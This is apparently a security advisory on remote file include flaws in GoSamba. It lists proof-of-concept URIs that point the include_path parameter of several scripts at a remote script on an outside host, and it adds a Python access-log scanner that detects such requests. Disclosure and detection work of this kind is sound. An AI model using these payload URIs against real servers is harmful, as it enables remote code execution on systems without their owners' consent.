GoSamba Include_Path Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/inc_group.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/inc_manager.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/inc_newgroup.php.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/inc_smb_conf.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/inc_user.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/main.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/include/HTML_oben.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/include/inc_freigabe.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/include/inc_freigabe1.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/include/inc_freigabe3.php?include_path=http://www.example2.com/scripts/020.txt?
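
A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web server access-log lines for an include_path query parameter whose value is a URL or stream wrapper rather than a local path. The common/combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Matches the request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A value that starts with a scheme or wrapper (http://, ftp://, php://, data:) or a
# protocol-relative "//host" is a remote or wrapper reference, not a local directory.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) up to max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_include_path_abuse(log_lines):
    """Return (line_number, script_path, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        # parse_qsl already percent-decodes each value once.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.lower() != "include_path":
                continue
            value = decode_fully(value)
            if REMOTE_RE.match(value):
                hits.append((number, parts.path, value))
    return hits

# Constructed sample log lines (documentation addresses and example hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /main.php?include_path=http://www.example2.com/scripts/020.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /include/inc_freigabe.php?include_path=%2568ttp%253A%252F%252Fwww.example2.com%252Fx.txt HTTP/1.1" 200 498',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /inc_user.php?include_path=include/ HTTP/1.1" 200 2048',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?page=2 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, path, value in find_include_path_abuse(SAMPLE_LOG):
        print(f"line {number}: {path} include_path={value}")
```

The check keys on the parameter name rather than on the script names, so it covers all of the listed scripts as well as any other script that accepts include_path.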


 

Copyright 2010, SecurityFocus